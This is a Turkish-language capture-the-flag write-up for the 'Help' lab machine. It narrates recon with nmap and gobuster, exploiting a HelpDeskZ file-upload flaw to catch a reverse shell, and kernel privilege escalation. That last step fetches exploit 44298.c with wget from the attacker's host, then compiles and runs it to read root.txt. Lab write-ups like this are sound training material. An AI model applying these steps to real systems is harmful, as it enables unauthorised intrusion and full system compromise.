Selamlar herkese. Bu seferki makinemiz 20 puanlık Help makinesi. Gayet kolay, çerezlik bir makine. Hızlıca çözüme geçelim ki hızlı bitsin, acelem var.

Acelem olduğu için nmap sonucunu da evde hazırlayıp getirdim, hemen inceleyelim.

80 portumuz açık, hızlıca tarayıcıdan adrese gidelim.

Apache Default Page… Sabır çekip moral bozmadan derinlere inelim.

Dirb kullanmak istemiyorum, gobuster kullanarak bir dizin taraması atalım.

hemen bi bakalım neymiş bu /support dizini.

HelpDeskZ isimli değişik bir yardım paneli geldi. Sağını solunu kurcalayalım hemen.

Ticket açma bölümü bulduk, sunucuya bi şey göndermeli işler genelde mevzuyu çözdürür.

10 numara bir file upload bölümü geldi. Dosyayı hurraa diye upload etmeye çalışmadan önce programı biraz araştırdım. Ünlü bir ücretsiz yardım masası scriptiymiş.

Bi şey ünlü ve beleşse kesin exploiti vardır diyerek searchsploit aracından devam ediyoruz.

Arbitrary File Upload exploiti var, tam işimizi görecek cinsten. Acelem olduğu için acil shell atmam lazım, o yüzden önce bi scripti inceleyelim napıyormuş.

Exploit kodumuz upload edilen dosyaların obfuscate edilen dizinine ulaşıyor ve dosyayı tetikliyormuş.

Tamam buradan shell atacağız da exploit dosyayı tetikleyebilmek için bizden yine belli bir yere dizin bilgisi girmemizi istiyor. Şimdi biraz tarama yapıp buradan atılan dosyalar hangi dizine yükleniyor olabilir tespit edelim. Önce /support dizini altına bakmak için gobuster aracını çalıştıracağım.

Gayet anlaşılır bir isimlendirmeyle /uploads dizini geldi. İlk başta burası zannetsem de exploitin defalarca başarısız sonuçlanması sonucu daha da derine indim. Bir gobuster taraması da /support/uploads altına atalım.

Aradığımız dizine nihayet ulaştık. Atacağımız shell dosyasını support/uploads/tickets altından tetikleyeceğiz. Tamam şimdi her şey hazır, shell dosyasını upload edebiliriz.

Dosyayı upload ettiğimiz anda tetikleyebilmek için önce shell dosyasına yazdığımız portu netcat ile dinlemeye alalım ve devamında scripti çalıştıralım.

Shell dosyası tetiklendi ve terminalimize bir ters bağlantı düştü. Hemen bi user.txt okuyalım.

Artık yetki yükseltme aşamasına geçebiliriz. Bunun için önce uname -a  komutunu kullanarak makinenin kernel sürümünü kontrol edelim.

Ubuntu 4.4.0-116 kernel’ı için bir local exploit var mı kontrol edelim. Bunun için yine searchsploit kullanabiliriz.

C ile yazılmış bir exploit var, karşı makinede gcc de varsa işimiz çok rahat. Önce exploiti bulunduğum dizine kopyalıyorum.

Kopyaladığım exploiti zafiyetli makineye göndermek için python2 ile 80. porttan SimpleHTTPServer ayaklandırıyorum.

Daha sonra zafiyetli makinemden aldığım shell’e geçip wget http://10.10.14.191/44298.c  komutuyla istismar kodunu zafiyetli makineye çekiyorum.

Exploit Help makinesine aktarıldı. Şimdi gcc ile derleyip kodu çalıştırabiliriz.

gcc 44298.c -o pwn komutuyla derleyip chmod +x pwn  komutuyla derlenen programa çalıştırma yetkisi veriyoruz. Ve artık nihayet son aşamaya geçmek için ./pwn  komutuyla yetki yükseltebiliriz.

Ee, noldu şimdi? Makine çok kolaydı en azından şimdi whoami demeyip direkt root.txt bastıralım da, basana kadar “acaba root olduk mu?” diye korkumuz geçmesin, heyecan katsın.

Bismillah cat /root/root.txt

Çok şükür bir makineyle boğuşmamızdan daha , burnumuz bile kanamadan ayrıldık.

Okuduğunuz için teşekkürler. Sorularınız için bilalkan.com/contact

Tags: